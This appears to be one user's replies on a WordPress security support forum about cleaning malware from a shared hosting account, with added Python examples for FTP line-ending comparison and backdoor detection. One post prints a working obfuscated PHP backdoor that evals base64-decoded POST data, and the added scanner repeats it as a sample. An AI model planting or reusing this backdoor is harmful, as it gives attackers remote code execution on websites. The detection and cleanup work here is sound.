GreywolfComputer
Forum Replies Created
I can’t get the console to open on the page. I can only get it to open on the “Verify Java” screen that is at java.com. I’ve tried with 2 different computers on 2 different versions of windows/java/web browsers. And on different websites.
And only the IPs I’ve blocked the last couple of days show in the list.
Still not working. I get email alerts to attempted logins/lockouts, but only see my own activity in “all hits” tab and my own administrative logins in logins/logouts tab. Nothing else shows.
The scans work, just not the live activity view. I disabled the plugin, deleted it, then FTP’d the files and activated it again. Will see what happens.
I don’t remember. I don’t think so.
I’m going to work on that. And, I think, move some wordpress installs to renamed folders just in case.
Here is something interesting. In checking the WordFence Live Traffic and setting up blocks, etc. I see that one of the domains — a wordpress install I currently have with a homepage with a “coming soon” type message — is getting attempts from Russia to access files in actual directories in my hosting account; but which don’t reside under the domain/wordpress folder for that domain. Ex: http://www.mydomain.com/folder-that-holds-wordpress-folder-for-other-domain/wp-includes/user.php That would tell me someone saw the folders on the hosting account. The chance they saw MY ftp credentials is almost nil because I am the only one who uses it, has access to the password, and I use VERY secure passwords from a password generator/management program.
I’ve been checking a couple times a day on every site and I don’t see anything. WordFence says I’m clean. As does Sucuri. Also, other web scans from the outside. So, I’m going to cautiously say yes.
It’s shared with other customers. I suspected cross contamination because I couldn’t find a site at first that appeared to be actively infected; AND because I noticed some server issues around the time of these files being written. When I called them about the connection issues, they stated that they were having issues with the server. But, it’s possible that one of my sites was actively infected. The part that made me think not was that the random files it appeared to want to load were not present anywhere in my hosting accounts.
The FileZilla issue (changing ascii files and playing havoc with my comparison utilities) was apparently caused during an update in which the setting for doing all transfers binary was switched to “auto”. I always treated all files as binary. It makes for easier comparisons of text files.
The files changing is something FileZilla is doing. I FTP’d the files via webbrowser and via the file manager at Godaddy and they don’t change.
OK. Was able to get in. One more question, please.
I have checked and double-checked these wordpress sites on this server I had the problem on. I have used several external scanners like Sucuri and I have Wordfence scanned them. During my repair, I FTP’d the newest WordPress 4.0 zip contents to every wordpress install to make sure the core files were original.
In trying to be thorough, I have been looking at files and locations exploits use. I noticed something which might explain some issues I’ve had with file comparisons. But, I didn’t notice the pattern until this morning. I don’t know if it’s a program glitch or an exploit of some kind.
I noticed that the original wordpress file /includes/wp-db.php and the same file in the suspected hacked site folders on my computer are 2k difference in size. I checked the FTP server location against the original WordPress file and the files are the same size. If I download the wp-db.php file again, it also changes to 2k difference in size.
In comparing the files, any file I download from the FTP server compares identical via “text” or “ascii” compare. They show the same way in my text editor, too. But, CRC or Binary compare show them as different. In HEX compare view, there is an extra 0D or . character as the first character on every line.
If I upload the original wordpress file and immediately download it back to my computer, this change happens. Any ideas?
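One extra 0D byte per line and a size difference of about one byte per line is exactly what an ASCII-mode FTP transfer produces when it rewrites LF line endings as CRLF. The following Python check is an added example, not code from this thread or from Wordfence: it compares a downloaded copy against the pristine file both raw and with line endings normalized, so a transfer artefact is told apart from a real modification. The file contents are constructed samples.

```python
import hashlib

def normalize_eol(data: bytes) -> bytes:
    """Fold CRLF and bare CR line endings to LF so the compare ignores them."""
    return data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")

def compare_transfer(original: bytes, downloaded: bytes) -> dict:
    """Classify a downloaded copy as identical, line-endings-only, or really changed."""
    raw_equal = original == downloaded
    norm_equal = normalize_eol(original) == normalize_eol(downloaded)
    if raw_equal:
        verdict = "identical"
    elif norm_equal:
        verdict = "line endings only"
    else:
        verdict = "content differs"
    return {
        "verdict": verdict,
        "size_delta": len(downloaded) - len(original),
        "extra_cr": downloaded.count(b"\r") - original.count(b"\r"),
        # hash of the normalized bytes is what to compare against a known-good copy
        "sha256_normalized": hashlib.sha256(normalize_eol(downloaded)).hexdigest(),
    }

# Constructed stand-in for a core file as shipped: LF line endings
ORIGINAL = b"<?php\n// core file\nfunction f() {\n    return 1;\n}\n"
# The same bytes after an ASCII-mode FTP round trip: one 0D added per line
ROUNDTRIP = ORIGINAL.replace(b"\n", b"\r\n")
# A copy with a line appended: a real modification hiding behind the same noise
TAMPERED = ROUNDTRIP + b"// injected line\r\n"

if __name__ == "__main__":
    for label, copy in (("roundtrip", ROUNDTRIP), ("tampered", TAMPERED)):
        print(label, compare_transfer(ORIGINAL, copy)["verdict"])
```

A text or ASCII compare in a diff tool does the same normalization silently, which is why it reported the files identical while a CRC or binary compare did not.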
I will try now.
So… after many hours of searching through files, I found that the files were spread through all the folders of all websites on the server that is a shared environment from Godaddy. I removed or repaired all the files. Then ran Wordfence on all the wordpress sites. It now shows all of the sites clean.
Tim, I purchased 6 licenses — 3 in the first batch, 3 in the second, and was going about putting them in when I had been timed out of the wordfence login. So, I went to log in again and couldn’t. In my exhaustion, I don’t remember the password I used or even if I set one. I put in the email in “forgot” and I don’t receive any email to reset it. I sent you an email about this Thursday and didn’t receive a response.
I can’t log in to get my other 4 keys to finish the other sites.
I am liking WordFence. But, I am seeing some “connection reset” issues. I don’t know if they are something on the server or something Wordfence is doing. I don’t remember getting those errors before, but that doesn’t mean I wasn’t.
Okay, I found more files with the same lines in them and I found about 3 files in odd locations with the following code in them:
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n95e668'];if(isset($s22)){eval($s21($s22));}?>
Another thing I should mention is that all of these files contain ONLY the line of code. Nothing else. I searched the database for the strings that are in the “post” line and for anything that could be loading and I don’t see anything.
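The one-liner above hides the names it calls by picking characters out of the seed string $sF by index. The scanner below is an added example (not from this thread or from Wordfence): it reassembles every `$var[i].$var[j]...` chain from the assigned seed strings so the real function and superglobal names become readable, and flags a file that combines such a reassembled decoder and request superglobal with eval(). The sample is the line quoted above; scan_tree is a hypothetical helper for walking an account.

```python
import os
import re
SAMPLE = (  # constructed sample: the one-line file quoted in the post above
    '<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].'
    '$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);'
    "$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n95e668'];"
    'if(isset($s22)){eval($s21($s22));}?>'
)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')           # $sF="...";
CHAIN_RE = re.compile(r'((?:\$\w+\[\d+\]\s*\.\s*)+\$\w+\[\d+\])')  # $sF[4].$sF[5]...
INDEX_RE = re.compile(r'\$(\w+)\[(\d+)\]')
DECODERS = {"base64_decode", "gzinflate", "gzuncompress", "str_rot13"}
SUPERGLOBALS = {"_POST", "_GET", "_REQUEST", "_COOKIE"}

def resolve_index_chains(src: str) -> list:
    """Rebuild each string assembled from $var[i].$var[j]... pieces."""
    strings = dict(ASSIGN_RE.findall(src))
    resolved = []
    for chain in CHAIN_RE.findall(src):
        chars = []
        for name, idx in INDEX_RE.findall(chain):
            s = strings.get(name, "")
            chars.append(s[int(idx)] if int(idx) < len(s) else "?")
        resolved.append("".join(chars))
    return resolved

def scan_source(src: str) -> dict:
    """Flag eval() fed by a reassembled decoder name and a request superglobal."""
    resolved = resolve_index_chains(src)
    indicators = []
    if re.search(r"\beval\s*\(", src):
        indicators.append("eval")
    if "${" in src:  # variable-variable lookup, e.g. ${"_POST"}
        indicators.append("variable-variable")
    indicators += ["decoder:" + r.lower() for r in resolved if r.lower() in DECODERS]
    indicators += ["superglobal:" + r.upper() for r in resolved if r.upper() in SUPERGLOBALS]
    return {"resolved": resolved, "indicators": indicators,
            "suspicious": "eval" in indicators and len(indicators) >= 3}

def scan_tree(root: str) -> list:
    """Paths of .php files under root that trip the heuristic (hypothetical helper)."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in (n for n in files if n.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if scan_source(fh.read())["suspicious"]:
                    hits.append(path)
    return hits
```

For the sample, the resolved strings come out as BASE64_DECODE and _POST, which is why nothing in the database needs to load it: the file only acts when a request carries that POST parameter, so the request logs, not the database, are where its use would show.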